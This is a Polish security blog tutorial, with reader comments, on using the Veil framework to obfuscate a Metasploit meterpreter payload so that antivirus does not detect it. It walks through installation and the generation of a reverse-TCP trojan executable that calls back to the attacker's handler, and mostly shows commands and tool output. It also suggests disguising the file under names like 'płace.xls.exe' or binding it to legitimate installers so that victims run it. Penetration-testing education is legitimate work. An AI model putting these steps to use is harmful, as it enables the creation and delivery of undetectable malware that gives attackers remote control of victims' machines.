10:02
27/1/2014

Jak wiadomo, antywirusy nie są doskonałe. Złośliwe oprogramowanie potrafią wykryć dopiero po kilku latach od infekcji, jak to miało miejsce m.in. w przypadku Stuxnetu, a czasem wręcz świadomie nie chronią przed pewnymi przypadkami znanych od lat wirusów. Niemniej jednak, to właśnie program antwirusowy jest pierwszą przeszkodą jaką zazwyczaj napotka atakujący, któremu udało się znaleźć podatność w systemie ofiary i po jej udanym “wykorzystaniu” chciałby przejść do uruchomienia swojego złośliwego (shell) kodu. Czy zatem da się jakoś oszukać antywirusa i pozostać niewykrytym? Tak — i w tym artykule zajmiemy się opisem nowopowstałego frameworka, którego celem jest oszukać antwirusa i ułatwić wykonywanie testów penetracyjnych.

Autorem artykułu jest Krzysiek Nowak, jeden z pentesterów Niebezpiecznika a także trener szkolenia Bezpieczeństwo Sieci Komputerowych (testy penetracyjne) — najbliższa edycja tego szkolenia odbędzie się w Warszawie 5-7 marca, zostało jeszcze 5 wolnych miejsc. Kto pierwszy, ten lepszy ;)
Niniejszy artykuł ma charakter wyłącznie edukacyjny. Należy pamiętać, aby nie wykonywać testów penetracyjnych na sieciach i systemach, które nie należą do was lub co do których nie uzyskaliśmy odpowiedniej zgody od właściciela. Czym grozi nielegalne wykonywanie testów penetracyjnych? O tym pisaliśmy w jednym z “Poniedziałków z Prawnikiem“.

Czym jest Veil?

Veil

Veil

Veil jest frameworkiem, który automatyzuje proces zaciemniania (obfuskacji) shellcode’u trojanów wygenerowanych przy użyciu metasploita. Dzięki niemu, złośliwe oprogramowanie nie wzbudzi alarmu w trakcie skanu antywirusem. Być może niektórzy z was już spotkali się z podobnymi narzędziami (lub napisali własne). Veil jest projektem, który daje wam możliwość podejrzenia, z jakich technik korzystają inni, a dodatkowo pozwoli na włączenie się w rozwój tego frameworka — Veil to open source i każdy może zostać jego deweloperem.

Dlaczego w ogóle powstał Veil?

Wydawać by się mogło, że powstanie Veila ma tylko i wyłącznie negatywne skutki — tj. pomoc script kiddsom w generowaniu niewykrywalnych trojanów. Twórcy Veila twierdzą jednak, że narzędzie to podniesie efektywność testów penetracyjnych, ponieważ obecnie pentesterzy rezygnują z demonstrowania omijania systemów antywirusowych ze względu na ograniczony czas badania (nie każdy z klientów chce sfinansować tworzenie niewykrywalnego przez antywirusy kodu exploita, a popularne packery oraz sam metasploit są całkiem dobrze wykrywany przez antywirusy).

slide-4-638

Veil zresztą może też pomóc samym producentom antywirusów — w końcu widzą jego kod i stosowane techniki.

Instalacja

Instalację przeprowadzimy na dystrybucji Kali. Nie jest to trudne; Veil posiada wygodny instalator, który samodzielnie sprawdza zależności oraz instaluje wymagane pakiety. Niestety, nie radzi sobie z konfliktami i aktualizacją samego Kaliego, dlatego zacznijmy od przygotowania samego systemu:

root@kali:~# apt-get update && apt-get upgrade -y

UWAGA: zdarza się, że Kali zatrzymuje niektóre pakiety z uwagi na ich niekompatybilność:

root@kali:~# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
greenbone-security-assistant kali-linux libfreefare-bin libfreefare0 libnfc-bin mfcuk mfoc mfterm
0 upgraded, 0 newly installed, 0 to remove and 8 not upgraded.

Aby rozwiązać ten problem, najprościej po prostu odinstalować powyższe pakiety bez czyszczenia ich konfiguracji (apt-get remove pakiet lub aptitude upgrade, który dużo lepiej radzi sobie z rozwiązywaniem problemów w repozytorium). Po “czyszczeniu” warto zweryfikować poprzez: apt-get upgrade, czy system nie wstrzmuje paczek, lub nie chce jeszcze czegoś instalować. Jeśli problemy zostały rozwiązane, możemy zająć się właściwą instalacją.

W tym miejscu możemy wybrać 2 podejścia:

1. apt do instalacji pakietu ‘veil’
2. git do sklonowania repozytorium

Którą opcję wybrać? Jeśli chcemy w wygodny sposób aktualizować Veila, to warto skorzystać z opcji 1. Dzięki temu przy kolejnej aktualizacji apt-get wszystkie pakiety zostaną automatycznie podniesione do najnowszej wersji. Jeśli zależy nam na szybkim dostępie do najnowszych zmian w repozytorium Veil, wybierzmy podejście 2. Projekt rozwija się bardzo dynamicznie i z dnia na dzień gromadzi coraz więcej ludzi, dlatego zmiany wprowadzane do projektu Veil znacznie wyprzedzają te wprowadzane do paczek Kaliego.

W przypadku opcji 2 na początek należy sklonować oficjalne repo, pamiętając aby instalację wykonać z GUI. Dlaczego GUI? Instalator Veila korzysta z Wine do zainstalowania pythona dla Windowsa oraz kilku pluginów: python 2.5.7, pycrypto, pyinstaller.

root@kali:~# git clone https://github.com/veil-evasion/Veil

root@kali:~# cd Veil/setup
root@kali:~# ./setup.sh

04_setup

Jeśli proces instalacji zakończył się prawidłowo (przewiń okno konsoli i sprawdź, czy nie ma tam błędów) można przejść do generowania kodu.

Tworzenie niewykrywalnego wirusa/trojana/backdoora

W poniższym przykładzie wygenerujemy trojana dla Windowsa, który po wykonaniu na komputerze ofiary utworzy proces notepad.exe i zmigruje się do niego.

root@kali:~# cd Veil/
root@kali:~/Veil# ./Veil.py

05_veil_menu

Do tworzenia trojana wykorzystaj jeden z dostępnych payloadów:

[*] Available payloads:
1) c/meterpreter/rev_tcp
2) c/meterpreter/rev_tcp_service
3) c/shellcode_inject/virtual
4) c/shellcode_inject/void
5) cs/meterpreter/rev_tcp
6) cs/shellcode_inject/base64_substitution
7) cs/shellcode_inject/virtual
8) native/Hyperion
9) native/backdoor_factory
10) native/pe_scrambler
11) powershell/shellcode_inject/download_virtual
12) powershell/shellcode_inject/psexec_virtual
13) powershell/shellcode_inject/virtual
14) python/meterpreter/rev_http_contained
15) python/meterpreter/rev_https_contained
16) python/meterpreter/rev_tcp
17) python/shellcode_inject/aes_encrypt
18) python/shellcode_inject/arc_encrypt
19) python/shellcode_inject/base64_substitution
20) python/shellcode_inject/des_encrypt
21) python/shellcode_inject/flat
22) python/shellcode_inject/letter_substitution

Nas interesuje połączenie zwrotne meterpretera na porcie 8080, wybieramy więc opcję 16 (lub python/meterpreter/rev_tcp). Oto opcje payloadu:

Payload: python/meterpreter/rev_tcp loaded
Required Options:
Name Current Value Description
---- ------------- -----------
LHOST IP of the metasploit handler
LPORT 4444 Port of the metasploit handler
compile_to_exe Y Compile to an executable
expire_payload X Optional: Payloads expire after "X" days
use_pyherion N Use the pyherion encrypter

Available commands:
set set a specific option value
info show information about the payload
generate generate payload
back go to the main menu
exit exit Veil
[>] Please enter a command:

Zmianom należy poddać parametry: LHOST oraz LPORT tak, aby wskazywały na nasz host oraz port, który wcześniej wybraliśmy:

[>] Please enter a command: set LHOST 172.16.10.11
[>] Please enter a command: set LPORT 8080

W przypadku wyboru adresu IP, jeśli nie pamiętamy jaki jest obecnie używany w systemie, wcale nie trzeba wychodzić do osobnej konsoli i sprawdzać ifconfig. Veil obsługuje auto-uzupełnianie (klawisz TAB)

Teraz możemy wygenerować wykonywalny kod komendą generate :-)

[>] Please enter a command: generate
[*] Press [enter] for 'payload'
[>] Please enter the base name for output files: trojan.exe
[?] How would you like to create your payload executable?

1 - Pyinstaller (default)
2 - Py2Exe

[>] Please enter the number of your choice: 1

err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
51 INFO: wrote Z:\root\Veil\trojan.exe.spec
72 INFO: Testing for ability to set icons, version resources...
74 INFO: ... resource update available
78 INFO: UPX is not available.
1302 INFO: checking Analysis
1302 INFO: building Analysis because out00-Analysis.toc non existent
1302 INFO: running Analysis out00-Analysis.toc
1304 INFO: Adding Microsoft.VC90.CRT to dependent assemblies of final executable
1305 INFO: Searching for assembly x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww ...
1305 INFO: Found manifest C:\windows\WinSxS\Manifests\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375.manifest
1306 INFO: Searching for file msvcr90.dll
1308 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcr90.dll
1308 INFO: Searching for file msvcp90.dll
1308 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcp90.dll
1308 INFO: Searching for file msvcm90.dll
1309 INFO: Found file C:\windows\WinSxS\x86_Microsoft.VC90.CRT_1fc8b3b9a1e18e3b_9.0.21022.8_x-ww_d08d0375\msvcm90.dll
1410 INFO: Analyzing Z:\opt\pyinstaller-2.0\support\_pyi_bootstrap.py
2660 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\archive.py
2822 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\carchive.py
2999 INFO: Analyzing Z:\opt\pyinstaller-2.0\PyInstaller\loader\iu.py
3039 INFO: Analyzing /root/veil-output/source/trojan.exe.py
3200 INFO: Hidden import 'encodings' has been found otherwise
3200 INFO: Looking for run-time hooks
3202 INFO: Analyzing rthook Z:\opt\pyinstaller-2.0\support/rthooks/pyi_rth_encodings.py
3604 INFO: Warnings written to Z:\root\Veil\build\pyi.win32\trojan.exe\warntrojan.exe.txt
3607 INFO: checking PYZ
3607 INFO: rebuilding out00-PYZ.toc because out00-PYZ.pyz is missing
3607 INFO: building PYZ out00-PYZ.toc
4150 INFO: checking PKG
4150 INFO: rebuilding out00-PKG.toc because out00-PKG.pkg is missing
4150 INFO: building PKG out00-PKG.pkg
5078 INFO: checking EXE
5078 INFO: rebuilding out00-EXE.toc because trojan.exe.exe missing
5078 INFO: building EXE from out00-EXE.toc
5081 INFO: Appending archive to EXE Z:\root\Veil\dist\trojan.exe.exe

[*] Executable written to: /root/veil-output/compiled/trojan.exe.exe

Language: python
Payload: python/meterpreter/rev_tcp
Required Options: LHOST=172.16.10.11 LPORT=8080 compile_to_exe=Y
expire_payload=X use_pyherion=N
Payload File: /root/veil-output/source/trojan.exe.py
Handler File: /root/veil-output/handlers/trojan.exe_handler.rc

[*] Your payload files have been generated, don't get caught!
[!] And don't submit samples to any online scanner! ;)

I gotowe. Veil w katalogu /root/veil-output zostawił kilka danych:

 • 1. /root/veil-output/compiled/trojan.exe.exe – plik wykonywalny, do podrzucenia ofierze
 • 2. /root/veil-output/handlers/trojan.exe_handler.rc – gotowiec dla metasploita odpalający konsolę na porcie 8080 (msfconsole -r /root/veil-output/handlers/trojan.exe_handler.rc)
 • 3. /root/veil-output/source/trojan.exe.py – kod trojana w pythonie, wraz z payloadem

I to właściwie wszystko. Teraz należy użyć swoich umiejętności aby nakłonić ofiarę do uruchomienia ww. pliku oraz czekać na sesję meterpretera. Pomóc mogą banalne triki, takie jak zmiana nazwy pliku (płace.xls.exe lub gta_crack.exe) oraz jego ikony, gdyż za każdym razem exe będzie posiadał domyślną grafikę dla pythona:

06_trojan.exe

Alternatywnym rozwiązaniem oczywiście będzie “wyexploitowanie” systemu ofiary przy pomocy jakiejś podatności (np. ataku plikem PDF), a następnie samodzielnie uruchomienie ww. kodu w systemie ofiary …lub skorzystanie z Veil-Catapult, czyli nowej funkcjonalności Veila, która skupia się właśnie na rozwiązaniu problemu “dostarczenia” złośliwego kodu na komputer ofiary.

Które AV dają się oszukać?

Specjalnie nie wysyłałem trojanów do serwisów typu VirusTotal (to mogłoby sprawić, że sygnatury dla pliku pojawią się w następnej aktualizacji programu antywirusowego). Plik trojana został więc sprawdzony lokalnie przy pomocy ESET Smart Security oraz Symatec Endpoint Protection z bazą wirusów na dzień 2013-12-27 (dzień tworzenia artykułu) i programy te nie wykryły żadnego zagrożenia.

Inaczej sprawa ma się w przypadku wykonania niektórych komend już w samym meterpreterze. Tutaj trzeba uważać, by np komendą metsvc nie zdradzić swojej obecności w systemie.

Na marginesie, jeśli kogoś kusi jednak sprawdzenie wykrywalności w VirusTotalu, to warto skorzystać z SHA1 generowanego za każdym razem, kiedy Veil tworzy plik wykonywalny i komendy checkvt wprowadzona w rewizji 6a78658fd3a7f7153800cc9f989e55f7ee543151.

[>] Please enter a command: checkvt
[*] Checking Virus Total for payload hashes...
[*] No payloads found on VirusTotal!

Co jeszcze potrafi Veil?

Sporo. Kod generowany Veilem można podpiąć pod inne, “oryginalne” pliki exe — przestępcy często doklejają swoje złośliwe oprogramowanie do instalatorów popularnego oprogramowania, które następnie udostępniają w internecie (np. na torrentach). Dodatkowo, właśnie uruchomiono “podprojekt” Veil-Catapult, który skupia się właśnie na dostarczaniu payloadu na komputer ofiary przy pomocy kilku technik.

Aby dowiedzieć się czegoś więcej na temat Veila warto obejrzeć tutoriale video oraz najświeższe slajdy z konferencji ShmooCon (zapis video podobnego wykładu twórców Vaila jest tutaj).

Autorem artykułu jest Krzysiek Nowak, jeden z pentesterów Niebezpiecznika a także trener szkolenia Bezpieczeństwo Sieci Komputerowych (testy penetracyjne) — najbliższa edycja tego szkolenia odbędzie się w Warszawie 5-7 marca, i zostało tylko 5 wolnych miejsc. Kto pierwszy, ten lepszy ;)

Dowiedz się, jak zabezpieczyć swoje dane i pieniądze przed cyberprzestępcami. Wpadnij na nasz kultowy ~3 godzinny wykład pt. "Jak nie dać się zhackować?" i poznaj kilkadziesiąt praktycznych i przede wszystkim prostych do zastosowania porad, które skutecznie podniosą Twoje bezpieczeństwo i pomogą ochronić przed atakami Twoich najbliższych. Uczestnicy tego wykładu oceniają go na: 9,34/10!

Na ten wykład powinien przyjść każdy, kto korzysta z internetu na smartfonie lub komputerze, prywatnie albo służbowo. Wykład prowadzimy prostym językiem, wiec zrozumie go każdy, także osoby spoza branży IT. Dlatego na wykład możesz spokojnie przyjść ze swoimi rodzicami lub mniej technicznymih znajomych. W najbliższych tygodniach będziemy w poniższych miastach:

Zobacz pełen opis wykładu klikając tutaj lub kup bilet na wykład klikając tu.

36 komentarzy

Dodaj komentarz
 1. swietny art. dzieki Krzysiek ;)

 2. Dużo się napisałeś :)
  Muszę to kiedyś przetestować

 3. Bardzo fajne narzędzie, na chwilę obecną większość antywirusów nic nie wykrywa. Jest tylko jeden problem – kiedy próbuję ustawić LHOST na host z no-ip to niestety nie działa

 4. Wspaniale, teraz każdy scrip kiddo będzie w stanie nie tylko wygenerować sobie trojana ale jeszcze do tego uczynić go niewidzialnym dla AV…

  • No i bardzo dobrze! W końcu niedouczeni admnistratorzy przestaną opierać bezpieczeństwo firmowych sieci jedynie poprzez pakiet ,,centralnie zarządzanych antywirusów”. Słusznie Niebezpiecznik w komentarzu na Facebooku zasugerował, że dobrym sposobem na zabepzieczenie jest whitelisting.
   No i pamiętajcie, że ukrywanie przed av to nie nowość, są na rynku packery które się kupuje właśnie w tym celu. Taraz po prostu chłopaki zrobili to ,,za darmoche”. Podobnie kiedyś było z wejściem metasploita.

  • Czytając Twój komentarz można odnieść wrażenie że jesteś przekonany, że tylko tutaj została omówiona metoda tworzenia i ukrywania trojanów…
   Małe spostrzeżenie, w Internecie większość stron jest kopią innych stron (tym samym ich treści).
   Co za tym idzie, osoby, które mają “olej w głowie” i znają angielski już dawno potrafią, Ci co nie znają a też mają “olej w głowie” są BARDZO dobrym ogniwem w łacuchu procesu bezpieczeństwa.
   Zgadzam się z >>idobrzeq<>Daniel<< jeżeli coś ma być dobre wymaga ciągłego rozwoju i dbania o to (analizy), tym samym sieć, komputer czy też inne ogniwa nie mogą dobrze funkcjonować, jeżeli osoby zarządzające nimi mają wiedzę z początku lat 90-tych i ich jedyna ingerencja to skopiowanie skryptu, pliku konfiguracyjnego etc. z portali typu lamuszek.pl lub zrob_to_za_mnie_bo_mi_sie_nie_chce.pl a jedyne podnoszenie wiedzy jakie te osoby doświadczają to poprzez takie czasopisma jak: "sieć dla malucha", "bezpieczeństwo dla leniwych" czy też "wyklikaj mi". Reasumując dobry produkt, usługa jest wynikiem stawiania wysoko poprzeczki "testów".

 5. Nie rozumiem o co ból dupy. Script kiddle sam nie wyexploituje żadnej luki, ponadto – w konfrontacji z poważniejszymi systemami są skazani na porażkę wynikającą z obsługi systemu przez osoby wykwalifikowane. Jedyne gdzie mogą narobić bałaganu to troszkę w LANach, włamać się do systemu kolegi z roku.. High risk priority panowie.

  Nie zaprzeczam że w poważnych instytucjach są trywialne błędy, ale generalizując – dostęp do wiedzy wpłynie pozytywnie na rozwój technik bezpieczeństwa(moim zdaniem).

 6. Czyli wirusy dla Windowsa robi się w Linuxie? Czyli nieuczciwa konkurencja?

  • A jaka to różnica? Kod możesz sobie napisać nawet na Amidze600 pod Workbenchem, albo na kartce A4, czy nawet na zrootowanym GPS-ie, za pomocą rysika…

 7. Boże tyle pisania a zwykłe bindowanie plików sprawi że powstanie trojan ze 100% FUD -.- a dodatkowo praktycznie każdy wykryty wirus można ukryć [po odpowiednim przerobieniu] i wgrany od nowa po przeróbce będzie niewykrywalny :-) i tyle wystarczyło napisać, żeby dzieci neo nie skumały… BTW Microsoft iexpress wystarczy na podstawy większości działań…

 8. dziala…..Kaspersky oraz McAfee poległ….

 9. > script kiddsom

  “script kiddie” =>”script kiddies”. oczywiście (nadal) wychodzić z tego będzie pokraka językowa, jeśli chcieć to spolszczać w taki sposób jak autor zrobił, ale to już bez większej różnicy.

 10. Czy ten artykuł to z dedykacją dla omawianego wcześniej “Armageddona”, czy już gościu wpadł w łapki organom?

 11. Tylko czemu wszystko z roota? To jest konieczne?

  • Bo sudo przy każdym wpisie rozjechało by jeszcze bardziej i tak już rozjechanego DIVa z kodem ;)

 12. Mam takie małe pytanko trochę niezwiązane z tematem: Czy jest jakiś sposób (np jakiś bootloader czy cuś), żeby komputer nie ładował systemu jeśli nie znajdzie odpowiednio skonfigurowanego pendriva?

  • Instalujesz bootloader na pendrivie i bez pendrive’a nie wystartuje. Kiedyś sobie tak przez przypadek zainstalowałem Debiana, że startował tylko z USB :)

  • Uściślając – ładujesz GRUBa na pendrive’a zamiast na HDD. No chyba, że chodziło Ci o Windowsy, to nie wiem, chociaż w takim przypadku też możesz załadować GRUBa z wpisem do Windowsa na pamięć przenośną, a z HDD usunąć boot-a. Wszystko się da, tylko trzeba pokombinować.

 13. regularnie używam z pentestu na pentest i sprawdza sie świetnie. nie musze marnować czasu na tworzenie własnego rozwiązania. pierwsze wydanie pojawiło się jakoś w maju 2013

  • odezwij się na prv z prawdziwym adresem e-mail ;)

 14. Tak jest sposob haslo na biosie ale skrocenie uruchamiania sie biosu by nie bylo widac komunikatu, ktory przycisk wcisnac by ukryc klawisz botowania czyli tzw szybkie uruchamianie tez do regulacji w biosie. A zeby rozgryzc haslo w biosie to trzeba jakiegos botkitu ale tego nikt raczej nie zna

 15. A co na takie pliki mowi: ThreadExpert? OK – programy AV
  nie wykrywaja plikow podczas klasycznego skanowania. Jak sprawa
  wyglada podczas uruchomienia takiego pliczku? (calkiem inne
  mechanizmy z Kasperskim zaczynaja dzialac I programik bedzie
  wykryty….)

 16. wszystko pieknie ladnie ale nikt nie podal linka do
  virustotal z wynikami skanowania. sam hasz to lipa jesli nikt nigdy
  nie zaladowal pliku na virustotal .

 17. tutaj jest jak chronić złośliwy kod przed analizą
  http://fivewithfour.blogspot.com/2013/11/sliskie-kody-w-asemblerze.html

 18. eee tam.. implementacja ciekawa ale każdy wir był kiedyś niewykrywalny przez bazy programów AV.
  Trzeba jednak pamiętać, że obecne AV to nie tylko bazy sygnatur ale sporo mechanizmów typu”control behavior” czy kontroli manipulacji w pamięci…
  Wrzućcie to na wszystkie aktualne av, uruchomcie …też mi testy:( bazami sygnatur…

  • Kod jest szyfrowany, technika jest bardzo skuteczna, przetestuj lokalnie wszystkie avsy to zobaczysz. Nie nie doceniałbym ‘eee tam’.

   I nie wszystkie i nie każdy ;)

   Super news w końcu ktoś ten temat poruszył. Przydało by się więcej opisu samej techniki pakowania/szyfrowania shell koda i wykonania go w maszynie Py na wintel.

   No i trochę lipa z wielkością binarki po takich zabiegach ;) Ciekawe czy uda się docelowo zoptymalizować generator ew. przerobić Py by troszkę zaoszczędzić na miejscu.

 19. Przegięliście z instruktarzem dla oszustów !

  To, że “profesjonalni” oszuści mieli już wcześniej dostęp do tego narzędzia, nie zwalnia Was z odpowiedzialności za potencjalne negatywne skutki, związane z tego typu publikacją :(
  Teraz także byle dowcipniś itp. może, m.in. dzięki Wam, stworzyć nierozpoznawalny malware, który może wyrządzić nie wiadomo ile złego, przed tym jak zostanie w końcu namierzony.

  Może teraz w ramach kontynuacji cyklu “pomagamy oszustom” opublikujecie artykuł typu: “jak kogoś otruć, aby nie pozostawić śladów” ?

  Jestem szczerze zniesmaczony Waszym występkiem i zastanawiam się, czy nie należałoby zgłosić Was do prokuratury w związku z podżeganiem do popełnienia przestępstwa.

  • Ale Urwał…

   Wszystko jest znane i open ;) Pozdro

  • Rozpędź się i uderz w ścianę Toja.
   http://www.wykop.pl/link/1537787/trujace-rosliny-na-polskich-lakach/

  • Ja to bym nawet zakazał noży sprzedawania. Teraz każdy może nimi zabijać!

  • Jak nie mówimy o problemie to go nie ma, tak? Po prostu LOL.

 20. […] pozorom, przed takimi atakami nie ochronią nas systemy antywirusowe — te można dość prosto oszukać, a dodatkowo warto podkreślić że do ataku na ważne […]

 21. […] zainstalować malware. W czasie demonstracji skorzystano z payloadów metasploita, który bez dodatkowych zabiegów, jest dość łatwo […]

 22. no i znowusz złodziej będzie sobie urzywał czasami zastanówcie się kto to może używać trochę więcej myślenia

 23. […] jest jeszcze powszechnie znany, z reguły nie zostanie wykryty przez programy antywirusowe (por. Jak zaciemnić kod złośliwego oprogramowania aby nie wykrył go antywirus?). Z pomocą może jednak przyjść EMET. Narzędzie umożliwia włączenie szeregu zabezpieczeń […]

 24. […] Jak tego dokonać uczymy na naszych szkoleniach z Bezpieczeństwa Sieci Komputerowych (testy penetracyjne), a podstawowe techniki zaciemniania kodu w celu omijania antywirusów opisywaliśmy kiedyś w tym artykule. […]

Twój komentarz

Zamieszczając komentarz akceptujesz regulamin dodawania komentarzy. Przez moderację nie przejdą: wycieczki osobiste, komentarze nie na temat, wulgaryzmy.

RSS dla komentarzy: